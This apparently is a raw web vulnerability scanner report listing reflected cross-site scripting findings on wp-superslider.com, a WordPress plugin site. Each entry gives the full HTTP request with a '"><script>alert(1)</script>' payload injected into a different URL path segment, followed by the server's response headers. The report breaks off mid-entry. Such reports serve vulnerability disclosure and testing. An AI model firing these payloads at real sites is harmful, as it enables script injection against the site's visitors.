<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 116ab"><script>alert(1)</script>ee2c400a80f was submitted in the REST URL parameter 7. This input was echoed as 116ab\"><script>alert(1)</script>ee2c400a80f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt116ab"><script>alert(1)</script>ee2c400a80f/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674552+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674553; expires=Thu, 02-Feb-2012 19:22:33 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:33 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5882b"><script>alert(1)</script>8f70873ebba was submitted in the REST URL parameter 8. This input was echoed as 5882b\"><script>alert(1)</script>8f70873ebba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default5882b"><script>alert(1)</script>8f70873ebba/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674554+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674554; expires=Thu, 02-Feb-2012 19:22:34 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44970"><script>alert(1)</script>402867fa415 was submitted in the REST URL parameter 9. This input was echoed as 44970\"><script>alert(1)</script>402867fa415 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css44970"><script>alert(1)</script>402867fa415 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:37 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674557+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674557; expires=Thu, 02-Feb-2012 19:22:37 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75bf0"><script>alert(1)</script>d53f8f09d5f was submitted in the REST URL parameter 1. This input was echoed as 75bf0\"><script>alert(1)</script>d53f8f09d5f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site75bf0"><script>alert(1)</script>d53f8f09d5f/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674542+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674542; expires=Thu, 02-Feb-2012 19:22:22 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:22 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31761"><script>alert(1)</script>9a2ec4ef367 was submitted in the REST URL parameter 2. This input was echoed as 31761\"><script>alert(1)</script>9a2ec4ef367 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content31761"><script>alert(1)</script>9a2ec4ef367/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:23 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674543+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674543; expires=Thu, 02-Feb-2012 19:22:23 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:23 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 214f6"><script>alert(1)</script>21d72fb4419 was submitted in the REST URL parameter 3. This input was echoed as 214f6\"><script>alert(1)</script>21d72fb4419 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins214f6"><script>alert(1)</script>21d72fb4419/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c380"><script>alert(1)</script>942fd5177a7 was submitted in the REST URL parameter 4. This input was echoed as 7c380\"><script>alert(1)</script>942fd5177a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login7c380"><script>alert(1)</script>942fd5177a7/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674547+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674547; expires=Thu, 02-Feb-2012 19:22:27 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:27 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53af1"><script>alert(1)</script>8d9b584a4b9 was submitted in the REST URL parameter 5. This input was echoed as 53af1\"><script>alert(1)</script>8d9b584a4b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login/plugin-data53af1"><script>alert(1)</script>8d9b584a4b9/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674548+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674549; expires=Thu, 02-Feb-2012 19:22:29 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:29 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d94d5"><script>alert(1)</script>8937e1e9ddf was submitted in the REST URL parameter 6. This input was echoed as d94d5\"><script>alert(1)</script>8937e1e9ddf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login/plugin-data/supersliderd94d5"><script>alert(1)</script>8937e1e9ddf/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674550+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674551; expires=Thu, 02-Feb-2012 19:22:31 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53483

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1d48"><script>alert(1)</script>dbdb56bcb58 was submitted in the REST URL parameter 7. This input was echoed as e1d48\"><script>alert(1)</script>dbdb56bcb58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogine1d48"><script>alert(1)</script>dbdb56bcb58/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674552+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674553; expires=Thu, 02-Feb-2012 19:22:33 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:33 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe00"><script>alert(1)</script>5f54c2a8b93 was submitted in the REST URL parameter 8. This input was echoed as afe00\"><script>alert(1)</script>5f54c2a8b93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/defaultafe00"><script>alert(1)</script>5f54c2a8b93/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674554+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674555; expires=Thu, 02-Feb-2012 19:22:35 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87487"><script>alert(1)</script>39e89501d03 was submitted in the REST URL parameter 9. This input was echoed as 87487\"><script>alert(1)</script>39e89501d03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css87487"><script>alert(1)</script>39e89501d03 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:37 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674557+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674557; expires=Thu, 02-Feb-2012 19:22:37 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea79a"><script>alert(1)</script>9de5f2df942 was submitted in the REST URL parameter 1. This input was echoed as ea79a\"><script>alert(1)</script>9de5f2df942 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /siteea79a"><script>alert(1)</script>9de5f2df942/wp-content/plugins/superslider-menu/js/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674561+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63b7c"><script>alert(1)</script>2271b17551d was submitted in the REST URL parameter 2. This input was echoed as 63b7c\"><script>alert(1)</script>2271b17551d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content63b7c"><script>alert(1)</script>2271b17551d/plugins/superslider-menu/js/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674563+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc9a"><script>alert(1)</script>550f85bc728 was submitted in the REST URL parameter 3. This input was echoed as dfc9a\"><script>alert(1)</script>550f85bc728 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
